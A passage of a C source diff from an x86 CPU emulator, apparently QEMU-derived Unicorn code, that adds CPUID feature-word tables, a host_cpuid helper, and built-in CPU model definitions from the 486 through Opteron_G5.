[FEAT_C000_0001_EDX] = { + .feat_names = ext4_feature_name, + .cpuid_eax = 0xC0000001, .cpuid_reg = R_EDX, + .tcg_features = TCG_EXT4_FEATURES, + }, + [FEAT_7_0_EBX] = { + .feat_names = cpuid_7_0_ebx_feature_name, + .cpuid_eax = 7, + .cpuid_needs_ecx = true, .cpuid_ecx = 0, + .cpuid_reg = R_EBX, + .tcg_features = TCG_7_0_EBX_FEATURES, + }, + [FEAT_8000_0007_EDX] = { + .feat_names = cpuid_apm_edx_feature_name, + .cpuid_eax = 0x80000007, + .cpuid_reg = R_EDX, + .tcg_features = TCG_APM_FEATURES, + .unmigratable_flags = CPUID_APM_INVTSC, + }, +#endif +}; + +typedef struct X86RegisterInfo32 { + /* Name of register */ + const char *name; + /* QAPI enum value register */ + X86CPURegister32 qapi_enum; +} X86RegisterInfo32; + +#define REGISTER(reg) \ + { #reg, X86_CPU_REGISTER32_##reg } +static const X86RegisterInfo32 x86_reg_info_32[CPU_NB_REGS32] = { + REGISTER(EAX), + REGISTER(ECX), + REGISTER(EDX), + REGISTER(EBX), + REGISTER(ESP), + REGISTER(EBP), + REGISTER(ESI), + REGISTER(EDI), +}; +#undef REGISTER + +typedef struct ExtSaveArea { + uint32_t feature, bits; + uint32_t offset, size; +} ExtSaveArea; + +const char *get_register_name_32(unsigned int reg) +{ + if (reg >= CPU_NB_REGS32) { + return NULL; + } + return x86_reg_info_32[reg].name; +} + +#ifdef _MSC_VER +#include +#endif + +void host_cpuid(uint32_t function, uint32_t count, + uint32_t *eax, uint32_t *ebx, uint32_t *ecx, uint32_t *edx) +{ + uint32_t vec[4]; + +#ifdef _MSC_VER + __cpuidex((int*)vec, function, count); +#else +#ifdef __x86_64__ + asm volatile("cpuid" + : "=a"(vec[0]), "=b"(vec[1]), + "=c"(vec[2]), "=d"(vec[3]) + : "0"(function), "c"(count) : "cc"); +#elif defined(__i386__) + asm volatile("pusha \n\t" + "cpuid \n\t" + "mov %%eax, 0(%2) \n\t" + "mov %%ebx, 4(%2) \n\t" + "mov %%ecx, 8(%2) \n\t" + "mov %%edx, 12(%2) \n\t" + "popa" + : : "a"(function), "c"(count), "S"(vec) + : "memory", "cc"); +#else + abort(); +#endif +#endif // _MSC_VER + + if (eax) + *eax = vec[0]; + if (ebx) + *ebx = vec[1]; + if (ecx) + *ecx = vec[2]; + if (edx) + *edx = vec[3]; +} + +#define iswhite(c) ((c) && ((c) <= ' ' || '~' < (c))) + +/* general substring compare of *[s1..e1) and *[s2..e2). sx is start of + * a substring. ex if !NULL points to the first char after a substring, + * otherwise the string is assumed to sized by a terminating nul. + * Return lexical ordering of *s1:*s2. + */ +static int sstrcmp(const char *s1, const char *e1, + const char *s2, const char *e2) +{ + for (;;) { + if (!*s1 || !*s2 || *s1 != *s2) + return (*s1 - *s2); + ++s1, ++s2; + if (s1 == e1 && s2 == e2) + return (0); + else if (s1 == e1) + return (*s2); + else if (s2 == e2) + return (*s1); + } +} + +/* compare *[s..e) to *altstr. *altstr may be a simple string or multiple + * '|' delimited (possibly empty) strings in which case search for a match + * within the alternatives proceeds left to right. Return 0 for success, + * non-zero otherwise. + */ +static int altcmp(const char *s, const char *e, const char *altstr) +{ + const char *p, *q; + + for (q = p = altstr; ; ) { + while (*p && *p != '|') + ++p; + if ((q == p && !*s) || (q != p && !sstrcmp(s, e, q, p))) + return (0); + if (!*p) + return (1); + else + q = ++p; + } +} + +/* search featureset for flag *[s..e), if found set corresponding bit in + * *pval and return true, otherwise return false + */ +static bool lookup_feature(uint32_t *pval, const char *s, const char *e, + const char **featureset) +{ + uint32_t mask; + const char **ppc; + bool found = false; + + for (mask = 1, ppc = featureset; mask; mask <<= 1, ++ppc) { + if (*ppc && !altcmp(s, e, *ppc)) { + *pval |= mask; + found = true; + } + } + return found; +} + +static void add_flagname_to_bitmaps(const char *flagname, + FeatureWordArray words, + Error **errp) +{ + FeatureWord w; + for (w = 0; w < FEATURE_WORDS; w++) { + FeatureWordInfo *wi = &feature_word_info[w]; + if (wi->feat_names && + lookup_feature(&words[w], flagname, NULL, wi->feat_names)) { + break; + } + } + if (w == FEATURE_WORDS) { + error_setg(errp, "CPU feature %s not found", flagname); + } +} + +/* CPU class name definitions: */ + +#define X86_CPU_TYPE_SUFFIX "-" TYPE_X86_CPU +#define X86_CPU_TYPE_NAME(name) (name X86_CPU_TYPE_SUFFIX) + +/* Return type name for a given CPU model name + * Caller is responsible for freeing the returned string. + */ +static char *x86_cpu_type_name(const char *model_name) +{ + return g_strdup_printf(X86_CPU_TYPE_NAME("%s"), model_name); +} + +static ObjectClass *x86_cpu_class_by_name(struct uc_struct *uc, const char *cpu_model) +{ + ObjectClass *oc; + char *typename; + + if (cpu_model == NULL) { + return NULL; + } + + typename = x86_cpu_type_name(cpu_model); + oc = object_class_by_name(uc, typename); + g_free(typename); + return oc; +} + +struct X86CPUDefinition { + const char *name; + uint32_t level; + uint32_t xlevel; + uint32_t xlevel2; + /* vendor is zero-terminated, 12 character ASCII string */ + char vendor[CPUID_VENDOR_SZ + 1]; + int family; + int model; + int stepping; + FeatureWordArray features; + char model_id[48]; + bool cache_info_passthrough; +}; + +static X86CPUDefinition builtin_x86_defs[] = { + { + "qemu64", + 4, 0x8000000A, 0, + CPUID_VENDOR_AMD, + 6, 6, 3, + { + // FEAT_1_EDX + PPRO_FEATURES | + CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | + CPUID_PSE36, + // FEAT_1_ECX + CPUID_EXT_SSE3 | CPUID_EXT_CX16 | CPUID_EXT_POPCNT, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + (PPRO_FEATURES & CPUID_EXT2_AMD_ALIASES) | + CPUID_EXT2_LM | CPUID_EXT2_SYSCALL | CPUID_EXT2_NX, + // FEAT_8000_0001_ECX + CPUID_EXT3_LAHF_LM | CPUID_EXT3_SVM | + CPUID_EXT3_ABM | CPUID_EXT3_SSE4A, + }, + }, + { + "phenom", + 5, 0x8000001A, 0, + CPUID_VENDOR_AMD, + 16, 2, 3, + { + /* Missing: CPUID_HT */ + // FEAT_1_EDX + PPRO_FEATURES | + CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | + CPUID_PSE36 | CPUID_VME, + // FEAT_1_ECX + CPUID_EXT_SSE3 | CPUID_EXT_MONITOR | CPUID_EXT_CX16 | + CPUID_EXT_POPCNT, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + (PPRO_FEATURES & CPUID_EXT2_AMD_ALIASES) | + CPUID_EXT2_LM | CPUID_EXT2_SYSCALL | CPUID_EXT2_NX | + CPUID_EXT2_3DNOW | CPUID_EXT2_3DNOWEXT | CPUID_EXT2_MMXEXT | + CPUID_EXT2_FFXSR | CPUID_EXT2_PDPE1GB | CPUID_EXT2_RDTSCP, + /* Missing: CPUID_EXT3_CMP_LEG, CPUID_EXT3_EXTAPIC, + CPUID_EXT3_CR8LEG, + CPUID_EXT3_MISALIGNSSE, CPUID_EXT3_3DNOWPREFETCH, + CPUID_EXT3_OSVW, CPUID_EXT3_IBS */ + // FEAT_8000_0001_ECX + CPUID_EXT3_LAHF_LM | CPUID_EXT3_SVM | + CPUID_EXT3_ABM | CPUID_EXT3_SSE4A, + // FEAT_8000_0007_EDX + 0, + // FEAT_C000_0001_EDX + 0, + // FEAT_KVM + 0, + /* Missing: CPUID_SVM_LBRV */ + // FEAT_SVM + CPUID_SVM_NPT, + }, + "AMD Phenom(tm) 9550 Quad-Core Processor", + }, + { + "core2duo", + 10, 0x80000008, 0, + CPUID_VENDOR_INTEL, + 6, 15, 11, + { + /* Missing: CPUID_DTS, CPUID_HT, CPUID_TM, CPUID_PBE */ + // FEAT_1_EDX + PPRO_FEATURES | + CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | + CPUID_PSE36 | CPUID_VME | CPUID_ACPI | CPUID_SS, + /* Missing: CPUID_EXT_DTES64, CPUID_EXT_DSCPL, CPUID_EXT_EST, + * CPUID_EXT_TM2, CPUID_EXT_XTPR, CPUID_EXT_PDCM, CPUID_EXT_VMX */ + // FEAT_1_ECX + CPUID_EXT_SSE3 | CPUID_EXT_MONITOR | CPUID_EXT_SSSE3 | + CPUID_EXT_CX16, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | CPUID_EXT2_SYSCALL | CPUID_EXT2_NX, + // FEAT_8000_0001_ECX + CPUID_EXT3_LAHF_LM, + }, + "Intel(R) Core(TM)2 Duo CPU T7700 @ 2.40GHz", + }, + { + "kvm64", + 5, 0x80000008, 0, + CPUID_VENDOR_INTEL, + 15, 6, 1, + { + /* Missing: CPUID_VME, CPUID_HT */ + // FEAT_1_EDX + PPRO_FEATURES | + CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | + CPUID_PSE36, + /* Missing: CPUID_EXT_POPCNT, CPUID_EXT_MONITOR */ + // FEAT_1_ECX + CPUID_EXT_SSE3 | CPUID_EXT_CX16, + // FEAT_7_0_EBX + 0, + /* Missing: CPUID_EXT2_PDPE1GB, CPUID_EXT2_RDTSCP */ + // FEAT_8000_0001_EDX + (PPRO_FEATURES & CPUID_EXT2_AMD_ALIASES) | + CPUID_EXT2_LM | CPUID_EXT2_SYSCALL | CPUID_EXT2_NX, + /* Missing: CPUID_EXT3_LAHF_LM, CPUID_EXT3_CMP_LEG, CPUID_EXT3_EXTAPIC, + CPUID_EXT3_CR8LEG, CPUID_EXT3_ABM, CPUID_EXT3_SSE4A, + CPUID_EXT3_MISALIGNSSE, CPUID_EXT3_3DNOWPREFETCH, + CPUID_EXT3_OSVW, CPUID_EXT3_IBS, CPUID_EXT3_SVM */ + // FEAT_8000_0001_ECX + 0, + }, + "Common KVM processor", + }, + { + "qemu32", + 4, 0x80000004, 0, + CPUID_VENDOR_INTEL, + 6, 6, 3, + { + // FEAT_1_EDX + PPRO_FEATURES, + // FEAT_1_ECX + CPUID_EXT_SSE3 | CPUID_EXT_POPCNT, + }, + }, + { + "kvm32", + 5, 0x80000008, 0, + CPUID_VENDOR_INTEL, + 15, 6, 1, + { + // FEAT_1_EDX + PPRO_FEATURES | + CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | CPUID_PSE36, + // FEAT_1_ECX + CPUID_EXT_SSE3, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + PPRO_FEATURES & CPUID_EXT2_AMD_ALIASES, + // FEAT_8000_0001_ECX + 0, + }, + "Common 32-bit KVM processor", + }, + { + "coreduo", + 10, 0x80000008, 0, + CPUID_VENDOR_INTEL, + 6, 14, 8, + { + /* Missing: CPUID_DTS, CPUID_HT, CPUID_TM, CPUID_PBE */ + // FEAT_1_EDX + PPRO_FEATURES | CPUID_VME | + CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | CPUID_ACPI | + CPUID_SS, + /* Missing: CPUID_EXT_EST, CPUID_EXT_TM2 , CPUID_EXT_XTPR, + * CPUID_EXT_PDCM, CPUID_EXT_VMX */ + // FEAT_1_ECX + CPUID_EXT_SSE3 | CPUID_EXT_MONITOR, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + CPUID_EXT2_NX, + }, + "Genuine Intel(R) CPU T2600 @ 2.16GHz", + }, + { + "486", + 1, 0, 0, + CPUID_VENDOR_INTEL, + 4, 8, 0, + { + // FEAT_1_EDX + I486_FEATURES, + }, + }, + { + "pentium", + 1, 0, 0, + CPUID_VENDOR_INTEL, + 5, 4, 3, + { + // FEAT_1_EDX + PENTIUM_FEATURES, + }, + }, + { + "pentium2", + 2, 0, 0, + CPUID_VENDOR_INTEL, + 6, 5, 2, + { + // FEAT_1_EDX + PENTIUM2_FEATURES, + }, + }, + { + "pentium3", + 2, 0, 0, + CPUID_VENDOR_INTEL, + 6, 7, 3, + { + // FEAT_1_EDX + PENTIUM3_FEATURES, + }, + }, + { + "athlon", + 2, 0x80000008, 0, + CPUID_VENDOR_AMD, + 6, 2, 3, + { + // FEAT_1_EDX + PPRO_FEATURES | CPUID_PSE36 | CPUID_VME | CPUID_MTRR | + CPUID_MCA, + // FEAT_1_ECX + 0, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + (PPRO_FEATURES & CPUID_EXT2_AMD_ALIASES) | + CPUID_EXT2_MMXEXT | CPUID_EXT2_3DNOW | CPUID_EXT2_3DNOWEXT, + }, + }, + { + "n270", + /* original is on level 10 */ + 5, 0x8000000A, 0, + CPUID_VENDOR_INTEL, + 6, 28, 2, + { + /* Missing: CPUID_DTS, CPUID_HT, CPUID_TM, CPUID_PBE */ + // FEAT_1_EDX + PPRO_FEATURES | + CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | CPUID_VME | + CPUID_ACPI | CPUID_SS, + /* Some CPUs got no CPUID_SEP */ + /* Missing: CPUID_EXT_DSCPL, CPUID_EXT_EST, CPUID_EXT_TM2, + * CPUID_EXT_XTPR */ + // FEAT_1_ECX + CPUID_EXT_SSE3 | CPUID_EXT_MONITOR | CPUID_EXT_SSSE3 | + CPUID_EXT_MOVBE, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + (PPRO_FEATURES & CPUID_EXT2_AMD_ALIASES) | + CPUID_EXT2_NX, + // FEAT_8000_0001_ECX + CPUID_EXT3_LAHF_LM, + }, + "Intel(R) Atom(TM) CPU N270 @ 1.60GHz", + }, + { + "Conroe", + 4, 0x8000000A, 0, + CPUID_VENDOR_INTEL, + 6, 15, 3, + { + // FEAT_1_EDX + CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | + CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | + CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | + CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | + CPUID_DE | CPUID_FP87, + // FEAT_1_ECX + CPUID_EXT_SSSE3 | CPUID_EXT_SSE3, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, + // FEAT_8000_0001_ECX + CPUID_EXT3_LAHF_LM, + }, + "Intel Celeron_4x0 (Conroe/Merom Class Core 2)", + }, + { + "Penryn", + 4, 0x8000000A, 0, + CPUID_VENDOR_INTEL, + 6, 23, 3, + { + // FEAT_1_EDX + CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | + CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | + CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | + CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | + CPUID_DE | CPUID_FP87, + // FEAT_1_ECX + CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | + CPUID_EXT_SSE3, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, + // FEAT_8000_0001_ECX + CPUID_EXT3_LAHF_LM, + }, + "Intel Core 2 Duo P9xxx (Penryn Class Core 2)", + }, + { + "Nehalem", + 4, 0x8000000A, 0, + CPUID_VENDOR_INTEL, + 6, 26, 3, + { + // FEAT_1_EDX + CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | + CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | + CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | + CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | + CPUID_DE | CPUID_FP87, + // FEAT_1_ECX + CPUID_EXT_POPCNT | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | + CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_SSE3, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | CPUID_EXT2_SYSCALL | CPUID_EXT2_NX, + // FEAT_8000_0001_ECX + CPUID_EXT3_LAHF_LM, + }, + "Intel Core i7 9xx (Nehalem Class Core i7)", + }, + { + "Westmere", + 11, 0x8000000A, 0, + CPUID_VENDOR_INTEL, + 6, 44, 1, + { + // FEAT_1_EDX + CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | + CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | + CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | + CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | + CPUID_DE | CPUID_FP87, + // FEAT_1_ECX + CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_SSE42 | + CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | + CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | CPUID_EXT2_SYSCALL | CPUID_EXT2_NX, + // FEAT_8000_0001_ECX + CPUID_EXT3_LAHF_LM, + }, + "Westmere E56xx/L56xx/X56xx (Nehalem-C)", + }, + { + "SandyBridge", + 0xd, 0x8000000A, 0, + CPUID_VENDOR_INTEL, + 6, 42, 1, + { + // FEAT_1_EDX + CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | + CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | + CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | + CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | + CPUID_DE | CPUID_FP87, + // FEAT_1_ECX + CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | + CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_POPCNT | + CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | + CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | + CPUID_EXT_SSE3, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | + CPUID_EXT2_SYSCALL, + // FEAT_8000_0001_ECX + CPUID_EXT3_LAHF_LM, + }, + "Intel Xeon E312xx (Sandy Bridge)", + }, + { + "Haswell", + 0xd, 0x8000000A, 0, + CPUID_VENDOR_INTEL, + 6, 60, 1, + { + // FEAT_1_EDX + CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | + CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | + CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | + CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | + CPUID_DE | CPUID_FP87, + // FEAT_1_ECX + CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | + CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | + CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | + CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3 | + CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_FMA | CPUID_EXT_MOVBE | + CPUID_EXT_PCID, + // FEAT_7_0_EBX + CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | + CPUID_7_0_EBX_HLE | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | + CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_INVPCID | + CPUID_7_0_EBX_RTM, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | + CPUID_EXT2_SYSCALL, + // FEAT_8000_0001_ECX + CPUID_EXT3_LAHF_LM, + }, + "Intel Core Processor (Haswell)", + }, + { + "Broadwell", + 0xd, 0x8000000A, 0, + CPUID_VENDOR_INTEL, + 6, 61, 2, + { + // FEAT_1_EDX + CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | + CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | + CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | + CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | + CPUID_DE | CPUID_FP87, + // FEAT_1_ECX + CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | + CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | + CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | + CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3 | + CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_FMA | CPUID_EXT_MOVBE | + CPUID_EXT_PCID, + // FEAT_7_0_EBX + CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | + CPUID_7_0_EBX_HLE | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | + CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_INVPCID | + CPUID_7_0_EBX_RTM | CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_ADX | + CPUID_7_0_EBX_SMAP, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | + CPUID_EXT2_SYSCALL, + // FEAT_8000_0001_ECX + CPUID_EXT3_LAHF_LM | CPUID_EXT3_3DNOWPREFETCH, + }, + "Intel Core Processor (Broadwell)", + }, + { + "Opteron_G1", + 5, 0x80000008, 0, + CPUID_VENDOR_AMD, + 15, 6, 1, + { + // FEAT_1_EDX + CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | + CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | + CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | + CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | + CPUID_DE | CPUID_FP87, + // FEAT_1_ECX + CPUID_EXT_SSE3, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | CPUID_EXT2_FXSR | CPUID_EXT2_MMX | + CPUID_EXT2_NX | CPUID_EXT2_PSE36 | CPUID_EXT2_PAT | + CPUID_EXT2_CMOV | CPUID_EXT2_MCA | CPUID_EXT2_PGE | + CPUID_EXT2_MTRR | CPUID_EXT2_SYSCALL | CPUID_EXT2_APIC | + CPUID_EXT2_CX8 | CPUID_EXT2_MCE | CPUID_EXT2_PAE | CPUID_EXT2_MSR | + CPUID_EXT2_TSC | CPUID_EXT2_PSE | CPUID_EXT2_DE | CPUID_EXT2_FPU, + }, + "AMD Opteron 240 (Gen 1 Class Opteron)", + }, + { + "Opteron_G2", + 5, 0x80000008, 0, + CPUID_VENDOR_AMD, + 15, 6, 1, + { + // FEAT_1_EDX + CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | + CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | + CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | + CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | + CPUID_DE | CPUID_FP87, + // FEAT_1_ECX + CPUID_EXT_CX16 | CPUID_EXT_SSE3, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_FXSR | + CPUID_EXT2_MMX | CPUID_EXT2_NX | CPUID_EXT2_PSE36 | + CPUID_EXT2_PAT | CPUID_EXT2_CMOV | CPUID_EXT2_MCA | + CPUID_EXT2_PGE | CPUID_EXT2_MTRR | CPUID_EXT2_SYSCALL | + CPUID_EXT2_APIC | CPUID_EXT2_CX8 | CPUID_EXT2_MCE | + CPUID_EXT2_PAE | CPUID_EXT2_MSR | CPUID_EXT2_TSC | CPUID_EXT2_PSE | + CPUID_EXT2_DE | CPUID_EXT2_FPU, + // FEAT_8000_0001_ECX + CPUID_EXT3_SVM | CPUID_EXT3_LAHF_LM, + }, + "AMD Opteron 22xx (Gen 2 Class Opteron)", + }, + { + "Opteron_G3", + 5, 0x80000008, 0, + CPUID_VENDOR_AMD, + 15, 6, 1, + { + // FEAT_1_EDX + CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | + CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | + CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | + CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | + CPUID_DE | CPUID_FP87, + // FEAT_1_ECX + CPUID_EXT_POPCNT | CPUID_EXT_CX16 | CPUID_EXT_MONITOR | + CPUID_EXT_SSE3, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_FXSR | + CPUID_EXT2_MMX | CPUID_EXT2_NX | CPUID_EXT2_PSE36 | + CPUID_EXT2_PAT | CPUID_EXT2_CMOV | CPUID_EXT2_MCA | + CPUID_EXT2_PGE | CPUID_EXT2_MTRR | CPUID_EXT2_SYSCALL | + CPUID_EXT2_APIC | CPUID_EXT2_CX8 | CPUID_EXT2_MCE | + CPUID_EXT2_PAE | CPUID_EXT2_MSR | CPUID_EXT2_TSC | CPUID_EXT2_PSE | + CPUID_EXT2_DE | CPUID_EXT2_FPU, + // FEAT_8000_0001_ECX + CPUID_EXT3_MISALIGNSSE | CPUID_EXT3_SSE4A | + CPUID_EXT3_ABM | CPUID_EXT3_SVM | CPUID_EXT3_LAHF_LM, + }, + "AMD Opteron 23xx (Gen 3 Class Opteron)", + }, + { + "Opteron_G4", + 0xd, 0x8000001A, 0, + CPUID_VENDOR_AMD, + 21, 1, 2, + { + // FEAT_1_EDX + CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | + CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | + CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | + CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | + CPUID_DE | CPUID_FP87, + // FEAT_1_ECX + CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | + CPUID_EXT_POPCNT | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | + CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | + CPUID_EXT_SSE3, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | + CPUID_EXT2_PDPE1GB | CPUID_EXT2_FXSR | CPUID_EXT2_MMX | + CPUID_EXT2_NX | CPUID_EXT2_PSE36 | CPUID_EXT2_PAT | + CPUID_EXT2_CMOV | CPUID_EXT2_MCA | CPUID_EXT2_PGE | + CPUID_EXT2_MTRR | CPUID_EXT2_SYSCALL | CPUID_EXT2_APIC | + CPUID_EXT2_CX8 | CPUID_EXT2_MCE | CPUID_EXT2_PAE | CPUID_EXT2_MSR | + CPUID_EXT2_TSC | CPUID_EXT2_PSE | CPUID_EXT2_DE | CPUID_EXT2_FPU, + // FEAT_8000_0001_ECX + CPUID_EXT3_FMA4 | CPUID_EXT3_XOP | + CPUID_EXT3_3DNOWPREFETCH | CPUID_EXT3_MISALIGNSSE | + CPUID_EXT3_SSE4A | CPUID_EXT3_ABM | CPUID_EXT3_SVM | + CPUID_EXT3_LAHF_LM, + }, + "AMD Opteron 62xx class CPU", + }, + { + "Opteron_G5", + 0xd, 0x8000001A, 0, + CPUID_VENDOR_AMD, + 21, 2, 0, + { + // FEAT_1_EDX + CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | + CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | + CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | + CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | + CPUID_DE | CPUID_FP87, + // FEAT_1_ECX + CPUID_EXT_F16C | CPUID_EXT_AVX | CPUID_EXT_XSAVE | + CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_SSE42 | + CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_FMA | + CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | + CPUID_EXT2_PDPE1GB | CPUID_EXT2_FXSR | CPUID_EXT2_MMX | + CPUID_EXT2_NX | CPUID_EXT2_PSE36 | 